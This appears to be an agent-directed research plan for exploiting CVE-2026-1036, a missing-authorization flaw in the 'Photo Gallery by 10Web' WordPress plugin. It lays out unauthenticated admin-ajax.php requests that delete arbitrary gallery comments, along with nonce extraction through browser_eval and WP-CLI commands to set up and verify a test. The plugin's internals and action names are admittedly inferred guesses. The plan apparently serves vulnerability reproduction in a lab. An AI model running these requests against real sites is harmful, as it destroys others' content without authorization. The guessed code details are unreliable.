Photo Gallery by 10Web – Mobile-Friendly Image Gallery <= 1.8.36 - Missing Authorization to Unauthenticated Arbitrary Comment Deletion

This research plan targets CVE-2026-1036, a missing authorization vulnerability in the "Photo Gallery by 10Web" plugin. Since specific source files were not provided, this plan is based on the vulnerability description and known architecture of the Photo Gallery plugin.

1. Vulnerability Summary

The Photo Gallery by 10Web plugin (v <= 1.8.36) fails to implement capability checks or adequate nonce validation on its comment deletion functionality. Specifically, the function delete_comment() is accessible via an AJAX action that lacks current_user_can() checks. Because the plugin registers this action for unauthenticated users (via wp_ajax_nopriv_*), an attacker can delete any comment from any image gallery by simply knowing the comment's database ID.

2. Attack Vector Analysis

• Endpoint: http://<target>/wp-admin/admin-ajax.php
• Action (Inferred): bwg_delete_comment or a generic handler like bwg_frontend_ajax with a task parameter.
• Payload Parameter: id (The database ID of the comment to delete).
• Authentication: None required (Unauthenticated).
• Preconditions:
  • The "Comments" feature must be active (usually a Pro feature, but the code exists in many versions).
  • At least one comment must exist on an image.

3. Code Flow (Inferred)

1. Registration: The plugin likely registers the AJAX hook in a controller or main file:
   add_action('wp_ajax_nopriv_bwg_delete_comment', array($this, 'delete_comment'));
2. Handler: The delete_comment() function (likely in frontend/models/BWGModelComments.php or admin/models/BWGModelComments.php) is invoked.
3. Missing Check: Inside delete_comment(), the code proceeds to perform a database deletion without verifying:
   • If a valid nonce is provided (check_ajax_referer).
   • If the requester has administrative privileges (current_user_can('manage_options')).
4. Sink: The code calls $wpdb->delete($wpdb->prefix . 'bwg_image_comment', array('id' => $id));.

4. Nonce Acquisition Strategy

If the plugin attempts to verify a nonce, it is likely exposed to unauthenticated users on pages containing a gallery.

1. Identify Trigger: The comments functionality is triggered by the [bwg_gallery] shortcode when the show_comments attribute is enabled.
2. Setup Page:
   wp post create --post_type=page --post_status=publish --post_title="Gallery Test" --post_content='[bwg_gallery id="1" show_comments="1"]'
3. Navigate: Use browser_navigate to view the newly created page.
4. Extract Nonce: Photo Gallery typically localizes its data into an object named bwg_objectsL10n or bwg_params.
   • Check for: browser_eval("window.bwg_objectsL10n?.bwg_nonce")
   • Check for: browser_eval("window.common_ajax_nonce")
5. Bypass Note: If wp_ajax_nopriv_ is used without any check_ajax_referer call, no nonce is required.

5. Exploitation Strategy

The agent should attempt the following unauthenticated POST request:

• URL: http://<target>/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Parameters:
  • action: bwg_delete_comment (Primary guess based on naming convention)
  • id: [COMMENT_ID] (The ID of the comment to be deleted)
  • nonce: [EXTRACTED_NONCE] (Optional, if found)

Refined Guess (Common Photo Gallery AJAX structure):
If the direct action fails, the plugin often uses a task-based router:

• action: bwg_frontend_ajax
• ajax_task: delete_comment
• id: [COMMENT_ID]

6. Test Data Setup

To verify the vulnerability, the environment must contain an existing comment:

1. Ensure Plugin is Active: wp plugin activate photo-gallery
2. Create a Gallery and Image: (Assuming some existing content or using WP-CLI to insert into custom tables).
3. Manually Insert a Comment:

   wp db query "INSERT INTO wp_bwg_image_comment (image_id, author, mail, comment, published) VALUES (1, 'Victim', 'victim@example.com', 'This is a valid comment', 1);"
   

4. Record the ID: Get the ID of the inserted comment:

   wp db query "SELECT id FROM wp_bwg_image_comment WHERE author='Victim' LIMIT 1;"
   

7. Expected Results

• Success Response: The server returns a 200 OK response, potentially with a JSON body like {"status":"success"} or a simple integer 1.
• Database Effect: The row corresponding to the id in the wp_bwg_image_comment table is removed.

8. Verification Steps

After sending the exploit request, verify the deletion via WP-CLI:

1. Check Table:

   wp db query "SELECT COUNT(*) FROM wp_bwg_image_comment WHERE author='Victim';"
   

2. Criteria: If the count is 0, the exploit is successful.

9. Alternative Approaches

If the wp_ajax_nopriv_bwg_delete_comment action is not found:

1. Search for Task Names: Search the plugin directory for the string "delete_comment" to find the exact AJAX action or ajax_task parameter name:
   grep -r "delete_comment" /var/www/html/wp-content/plugins/photo-gallery/
2. Check for Admin-only version: If the nopriv hook is missing, check if the wp_ajax_ hook (authenticated) fails to check for current_user_can(). If so, the vulnerability would require a Subscriber-level account (Minimal Authentication).
3. Trace Controller: Look into photo-gallery/admin/controllers/BWGControllerComments.php to see how the execute() or delete() methods are invoked.